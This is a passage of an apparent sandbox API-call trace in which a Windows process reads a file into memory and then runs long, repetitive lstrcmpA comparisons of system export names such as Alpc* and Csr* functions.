hTemplateFile=0x0) returned 0x140 [0216.087] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0216.087] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0216.087] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0216.087] GetProcessHeap () returned 0x560000 [0216.087] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1bba48) returned 0x417a040 [0216.092] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0216.092] ReadFile (in: hFile=0x140, lpBuffer=0x417a040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x417a040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0216.618] CloseHandle (hObject=0x140) returned 1 [0216.619] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0216.619] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0216.619] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0216.619] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0216.619] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0216.619] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0216.619] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0216.619] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0216.619] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0216.619] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0216.619] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0216.619] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0216.620] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0216.620] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0216.620] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0216.620] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0216.620] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0216.620] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0216.620] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0216.620] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0216.620] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0216.620] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0216.620] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0216.620] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0216.620] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0216.620] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0216.620] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0216.621] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0216.621] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0216.621] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0216.621] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0216.622] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0216.622] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0216.622] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0216.622] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0216.622] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0216.622] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0216.622] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0216.622] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0216.622] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0216.622] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0216.622] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0216.622] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0216.622] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0216.622] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0216.622] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0216.622] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0216.622] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0216.622] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0216.622] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0216.622] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0216.622] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0216.622] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0216.622] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0216.622] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0216.622] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0216.623] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0216.623] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0216.623] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0216.623] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0216.623] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0216.623] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0216.623] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0216.623] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0216.623] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0216.623] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0216.623] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0216.623] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0216.623] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0216.623] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0216.623] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0216.623] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0216.623] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0216.623] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0216.623] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0216.624] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0216.624] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0216.624] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0216.624] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0216.624] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0217.010] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0217.010] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0217.010] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0217.010] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0217.010] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0217.010] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0217.010] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0217.010] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0217.010] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0217.010] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0217.010] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0217.010] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0217.010] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0217.011] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0217.011] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0217.012] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0217.012] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0217.012] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0217.012] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0217.012] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0217.013] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0217.013] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0217.013] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0217.013] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0217.013] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0217.013] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0217.013] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0217.013] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0217.013] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0217.013] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0217.013] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0217.013] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0217.013] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0217.013] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0217.013] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0217.013] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0217.013] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0217.013] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0217.013] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0217.013] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0217.013] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0217.014] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0217.014] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0217.014] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0217.014] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0217.014] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0217.014] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0217.014] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0217.014] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0217.014] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0217.014] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0217.014] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0217.014] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0217.014] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0217.014] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0217.014] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0217.014] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0217.014] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0217.014] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0217.014] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0217.014] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0217.014] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0217.014] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0217.014] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0217.014] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0217.014] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0217.014] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0217.014] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0217.015] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAFinal") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAInit") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="A_SHAUpdate") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetHeaderSize") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageAttribute") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionList") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcRundownCompletionList") returned 1 [0217.015] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionList") returned 1 [0217.028] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0217.028] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0217.028] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateCaptureBuffer") returned 1 [0217.028] lstrcmpA (lpString1="CsrAllocateMessagePointer", lpString2="CsrAllocateMessagePointer") returned 0 [0217.028] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAFinal") returned 1 [0217.028] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAInit") returned 1 [0217.028] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="A_SHAUpdate") returned 1 [0217.028] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0217.028] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0217.029] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0217.029] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0217.029] lstrcmpA (lpString1="CsrCaptureMessageBuffer", lpString2="AlpcGetHeaderSize") returned 